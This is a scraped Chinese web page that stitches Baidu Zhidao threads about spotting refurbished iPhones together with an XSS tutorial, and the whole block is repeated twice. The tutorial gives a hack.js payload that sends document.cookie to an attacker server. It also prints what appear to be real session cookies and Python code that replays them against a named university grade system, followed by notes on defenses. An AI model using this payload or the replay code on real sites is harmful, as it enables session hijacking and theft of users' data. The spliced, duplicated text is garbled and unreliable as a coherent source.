查一下xss手机x1型查iphone是不是翻新机机
点击联系发帖人
时间:2015-08-19 14:01
求高手帮我查一下这苹果手机是不是翻新机!!谢谢!!814_百度知道
求高手帮我查一下这苹果手机是不是翻新机!!谢谢!!814
提问者采纳
该设备已过保修期 设备信息产品型号IPHONE 4S 16GB 白色产品序列号(SN)814iOS版本6.0保修已过,如果是刚买的的则是翻新机
提问者评价
原来是这样,感谢!
来自团队:
其他类似问题
480人觉得有用
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁web安全之XSS | 阅读前端
XSS即Cross Site Script,跨站脚本攻击。本来缩写是CSS,为了不和层叠样式表冲突所以一般叫做XSS。
XSS攻击指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。
XSS根据效果不同可简单分为以下几类:
Non-persistent XSS:非持久型XSS,又叫反射型XSS。把用户输入的数据反射给浏览器,一般通过构造非法数据来让浏览器执行恶意脚本。
Persistent XSS:存储型XSS会把用户的输入数据存储到服务端,这种XSS具有很强的稳定性。
DOM Based XSS:通过修改DOM节点形成的XSS,从效果上来看也属于Non-persistent XSS。
XSS攻击成功后,攻击者能够对用户当前页面插入恶意脚本,这种恶意脚本就叫做XSS Payload(恶意脚本也可以是Flash或者其他富客户端脚本)。
一个最常见的XSS Payload就是通过读取Cookie来发起“Cookie 劫持”。以华科的hub系统查成绩功能为例,hub查成绩的页面请求为:
http://bksjw./aam/score/QueryScoreByStudent_queryScore.action
http://bksjw./aam/score/QueryScoreByStudent_queryScore.action
如果不登录直接请求改页面,服务端会302跳转到登录主页:
url="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"
r=requests.get(url)
print r.url #输出http://bksjw./index.jsp,302跳转到了登录页面
#pythonurl="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"r=requests.get(url)print r.url #输出http://bksjw./index.jsp,302跳转到了登录页面
如果hub有某个XSS漏洞,那么攻击者就可以在hub的网站上插入一段代码,执行远程脚本:
JavaScript
&script src="/hack.js"&&/script&
&script src="/hack.js"&&/script&
hack.js是攻击者在自己服务器上的脚本,内容可以像下面这样:
JavaScript
var img=document.createElement("img");
img.src="/log?"+escape(document.cookie);
var img=document.createElement("img");img.src="/log?"+escape(document.cookie);
这样就可以获取到用户的cookies:
"JSESSIONID=0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4; usertype= hub_service=aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA=="
"JSESSIONID=0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4; usertype= hub_service=aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA=="
接下来查询成绩的时候同时发送Cookies就能成功了:
url="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"
cks=dict(JSESSIONID="0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4",usertype="xs",hub_service="aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA==")
r=requests.get(url,cookies=cks)
print r.url
#输出u'http://bksjw./aam/score/QueryScoreByStudent_queryScore.action',说明没有跳转
print r.status_code #200,响应成功
print r.text #输出响应文本,此处略...
#pythonurl="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"cks=dict(JSESSIONID="0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4",usertype="xs",hub_service="aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA==")r=requests.get(url,cookies=cks)print r.url #输出u'http://bksjw./aam/score/QueryScoreByStudent_queryScore.action',说明没有跳转print r.status_code #200,响应成功print r.text #输出响应文本,此处略...
这样只需要完成“Cookie 劫持”,无需用户的账号密码就可以获取用户数据。
以上只是一个简单的例子,并不具有破坏性,如果页面存在XSS漏洞,那么用户可以直接在当前页面插入脚本来操作数据,比如插入图片来向服务器发送GET请求,或者插入form表单来发送post请求。攻击者可以通过脚本来检测浏览器版本和操作系统信息,在IE中,可以通过判断ActiveX控件的classid来推测用户安装的软件(firefox中可以通过navigator.plugins来检测),利用对应的浏览器漏洞来植入木马。
以上XSS攻击都是非持久型的,持久型的XSS危害更大。一般来说,用户之间发生交互行为的页面,如果存在存储型XSS,则比较容易发起XSS Worm攻击,有兴趣可以查一下“百度空间XSS Worm漏”或“MySpace XSS Worm”。
XSS的破坏性非常大,但是实际上要成功的构造XSS攻击还是很困难的,以下是一些常见的XSS构造技巧,在网站设计时要考虑到。
1.利用字符编码
字符转码的时候可能会现问题,百度曾经就干过这事。
2.绕过长度限制
可以利用location.hash,window.name或者远程代码来绕过长度限制。
3.使用&base&标签
攻击者在用户页面插入base标签,从而让页面内所有的相对路径图片都指向远程服务器的伪造图片,引诱用户上当。
4.强大的window.name
window.name可以用来跨域,利用这个特点可以实施XSS攻击。
知道XSS的原理和攻击手段之后才能更好的防御。web安全的攻与防一直在不停的演变着,谁怠慢谁就会占据下风。浏览器一般会内置一些对抗XSS的措施,比如Firefox的CSP,Noscript扩展,IE 8的XSS Filter等。对于网站来说,也应该要采用优秀的解决方案,保证用户不被XSS攻击。
HttpOnly实在Set-Cookie时标记的,浏览器禁止javascript访问带有HttpOnly属性的Cookies,这样一来远程脚本就无法访问Cookies了。
服务端对用户的不合法数据要进行过滤,比如”&script&”,”javascript”等。这种输入检查的方式称为“XSS Filter”。
一般来说,除了富文本的输出外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。求大神给我查一下我的手机激活时间,,,是不是翻新机,序列号是S 型号是MC603ZP 是苹果四_百度知道
求大神给我查一下我的手机激活时间,,,是不是翻新机,序列号是S 型号是MC603ZP 是苹果四
提问者采纳
设备型号: iPhone 4激活状态:已激活序列号:S硬件保修到期:已过期生产日期:2011年9月 (36周)剩余保修日期:已过期生产地区:中国电话客服日期:已过期
是翻新机吗?朋友手里买的,包装好的
这手机至少使用一年了,二手机
提问者评价
太感谢了,真心有用
来自团队:
其他类似问题
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是否翻新机 在线等_百度知道
哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是否翻新机 在线等
哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是不是翻新机 保质期到什么时候 感激不尽型号:MC318LL序列号:7S029Xw3A4SIMEI:112 能否根据这些信息查出是不是已经激活 是不是翻新机 是美版的嘛
提问者采纳
食翻新的,日。已经过期。希望采纳
其他类似问题
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}
求高手帮我查一下这苹果手机是不是翻新机!!谢谢!!814
提问者采纳
该设备已过保修期 设备信息产品型号IPHONE 4S 16GB 白色产品序列号(SN)814iOS版本6.0保修已过,如果是刚买的的则是翻新机
提问者评价
原来是这样,感谢!
来自团队:
其他类似问题
480人觉得有用
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁web安全之XSS | 阅读前端
XSS即Cross Site Script,跨站脚本攻击。本来缩写是CSS,为了不和层叠样式表冲突所以一般叫做XSS。
XSS攻击指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。
XSS根据效果不同可简单分为以下几类:
Non-persistent XSS:非持久型XSS,又叫反射型XSS。把用户输入的数据反射给浏览器,一般通过构造非法数据来让浏览器执行恶意脚本。
Persistent XSS:存储型XSS会把用户的输入数据存储到服务端,这种XSS具有很强的稳定性。
DOM Based XSS:通过修改DOM节点形成的XSS,从效果上来看也属于Non-persistent XSS。
XSS攻击成功后,攻击者能够对用户当前页面插入恶意脚本,这种恶意脚本就叫做XSS Payload(恶意脚本也可以是Flash或者其他富客户端脚本)。
一个最常见的XSS Payload就是通过读取Cookie来发起“Cookie 劫持”。以华科的hub系统查成绩功能为例,hub查成绩的页面请求为:
http://bksjw./aam/score/QueryScoreByStudent_queryScore.action
http://bksjw./aam/score/QueryScoreByStudent_queryScore.action
如果不登录直接请求改页面,服务端会302跳转到登录主页:
url="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"
r=requests.get(url)
print r.url #输出http://bksjw./index.jsp,302跳转到了登录页面
#pythonurl="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"r=requests.get(url)print r.url #输出http://bksjw./index.jsp,302跳转到了登录页面
如果hub有某个XSS漏洞,那么攻击者就可以在hub的网站上插入一段代码,执行远程脚本:
JavaScript
&script src="/hack.js"&&/script&
&script src="/hack.js"&&/script&
hack.js是攻击者在自己服务器上的脚本,内容可以像下面这样:
JavaScript
var img=document.createElement("img");
img.src="/log?"+escape(document.cookie);
var img=document.createElement("img");img.src="/log?"+escape(document.cookie);
这样就可以获取到用户的cookies:
"JSESSIONID=0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4; usertype= hub_service=aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA=="
"JSESSIONID=0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4; usertype= hub_service=aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA=="
接下来查询成绩的时候同时发送Cookies就能成功了:
url="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"
cks=dict(JSESSIONID="0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4",usertype="xs",hub_service="aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA==")
r=requests.get(url,cookies=cks)
print r.url
#输出u'http://bksjw./aam/score/QueryScoreByStudent_queryScore.action',说明没有跳转
print r.status_code #200,响应成功
print r.text #输出响应文本,此处略...
#pythonurl="http://bksjw./aam/score/QueryScoreByStudent_queryScore.action"cks=dict(JSESSIONID="0000udqNnxxg9TxLSkO-_kX06Qxea:167inu3t4",usertype="xs",hub_service="aGt4DxzSWbjfj4UD+NVtoxvWw7a8L9hNMiHDZJveYRhFGSg/eEyJEgCfvCFWvqBeYf8mRX1H5nbea9WA==")r=requests.get(url,cookies=cks)print r.url #输出u'http://bksjw./aam/score/QueryScoreByStudent_queryScore.action',说明没有跳转print r.status_code #200,响应成功print r.text #输出响应文本,此处略...
这样只需要完成“Cookie 劫持”,无需用户的账号密码就可以获取用户数据。
以上只是一个简单的例子,并不具有破坏性,如果页面存在XSS漏洞,那么用户可以直接在当前页面插入脚本来操作数据,比如插入图片来向服务器发送GET请求,或者插入form表单来发送post请求。攻击者可以通过脚本来检测浏览器版本和操作系统信息,在IE中,可以通过判断ActiveX控件的classid来推测用户安装的软件(firefox中可以通过navigator.plugins来检测),利用对应的浏览器漏洞来植入木马。
以上XSS攻击都是非持久型的,持久型的XSS危害更大。一般来说,用户之间发生交互行为的页面,如果存在存储型XSS,则比较容易发起XSS Worm攻击,有兴趣可以查一下“百度空间XSS Worm漏”或“MySpace XSS Worm”。
XSS的破坏性非常大,但是实际上要成功的构造XSS攻击还是很困难的,以下是一些常见的XSS构造技巧,在网站设计时要考虑到。
1.利用字符编码
字符转码的时候可能会现问题,百度曾经就干过这事。
2.绕过长度限制
可以利用location.hash,window.name或者远程代码来绕过长度限制。
3.使用&base&标签
攻击者在用户页面插入base标签,从而让页面内所有的相对路径图片都指向远程服务器的伪造图片,引诱用户上当。
4.强大的window.name
window.name可以用来跨域,利用这个特点可以实施XSS攻击。
知道XSS的原理和攻击手段之后才能更好的防御。web安全的攻与防一直在不停的演变着,谁怠慢谁就会占据下风。浏览器一般会内置一些对抗XSS的措施,比如Firefox的CSP,Noscript扩展,IE 8的XSS Filter等。对于网站来说,也应该要采用优秀的解决方案,保证用户不被XSS攻击。
HttpOnly实在Set-Cookie时标记的,浏览器禁止javascript访问带有HttpOnly属性的Cookies,这样一来远程脚本就无法访问Cookies了。
服务端对用户的不合法数据要进行过滤,比如”&script&”,”javascript”等。这种输入检查的方式称为“XSS Filter”。
一般来说,除了富文本的输出外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。求大神给我查一下我的手机激活时间,,,是不是翻新机,序列号是S 型号是MC603ZP 是苹果四_百度知道
求大神给我查一下我的手机激活时间,,,是不是翻新机,序列号是S 型号是MC603ZP 是苹果四
提问者采纳
设备型号: iPhone 4激活状态:已激活序列号:S硬件保修到期:已过期生产日期:2011年9月 (36周)剩余保修日期:已过期生产地区:中国电话客服日期:已过期
是翻新机吗?朋友手里买的,包装好的
这手机至少使用一年了,二手机
提问者评价
太感谢了,真心有用
来自团队:
其他类似问题
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是否翻新机 在线等_百度知道
哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是否翻新机 在线等
哪位大侠能帮忙到iphone的官网帮忙查一下 这个手机是不是翻新机 保质期到什么时候 感激不尽型号:MC318LL序列号:7S029Xw3A4SIMEI:112 能否根据这些信息查出是不是已经激活 是不是翻新机 是美版的嘛
提问者采纳
食翻新的,日。已经过期。希望采纳
其他类似问题
为您推荐:
翻新机的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}
我要回帖
更多关于 怎么查5s是不是翻新机 的文章
更多推荐
- ·云天化学校好还是鲁甸崇文中学好高级中学一个学期的费用是多少?
- ·重庆大学两江新区校区有什么新的科学实验中心建设吗?
- ·藏区1+2学校排名 2有哪些学校
- ·郑州市高三培训机构排名前十益学教育新高一暑假班怎么样,有人知道吗?
- ·求帮高三应该买什么辅导书学生想买全科的辅导书,推荐买哪一种?
- ·死亡岛激流无法启动无图像问题
- ·史诗塔防元素篇为什么继续游戏点不了?怎么可以恢复?
- ·cf圣龙戒指属性提升星际是随机的么?
- ·什么功夫可以实战好用 不要散打 跆拳道和中国功夫 我要中国功夫
- ·雨打梨花的博雅象棋残局雨打梨花怎么解?有图吗?
- ·下个PSP游戏文件后缀psp文件是.psp该怎么用,我试着改成.iso也不行
- ·lol深海泰坦天赋和海洋之灾哪个好
- ·请问这是出自古诗词的游戏名字哪部游戏?
- ·她给我发了个5.20的微信红包没领完怎么办,我该怎么办
- ·哪一种手机怎么root权限获取获取root成功率最大
- ·万虹p39a系统文件系统手机下载
- ·3g手机型号TD8208型号lephone怎么格式化
- ·没电脑买个无线路由器手机线路板能用吗
- ·我能下载奇迹暖暖安装不上,但安装十几次都是应用程序未安装,我也是ViVO。求解答!!!
- ·查一下xss手机x1型查iphone是不是翻新机机
- ·卡西欧tr350二手屏幕没有美颜显示怎么设置
- ·哪款双频无线路由器好周盖商务手机那款好
- ·怎么微博如何设置手机型号微博来源
- ·带蓝钻的手机怎么开通蓝钻要15万。
- ·小米小米2升级后开不了机每次上网得设置
- ·手机锁屏签名在哪oppo r7 怎么锁屏
- ·小波变换中什么是归一化因子子的作用,为什么要这样做
- ·818手机节上旧数据一键导入oem新手机用的是什么办法?
- ·vivoy13手机型号的手机
- ·安卓机也能刷Win10吗,有下载吗,米4win10刷机包下载吗!?
- ·我得iphone语音只能说两秒为什么QQ接收不到50秒以上得语音?
- ·苹果五苹果5s现在多少钱钱
- ·小米盒子没有声音声音
- ·求推荐国内靠谱助手请求失败的照明设计公司
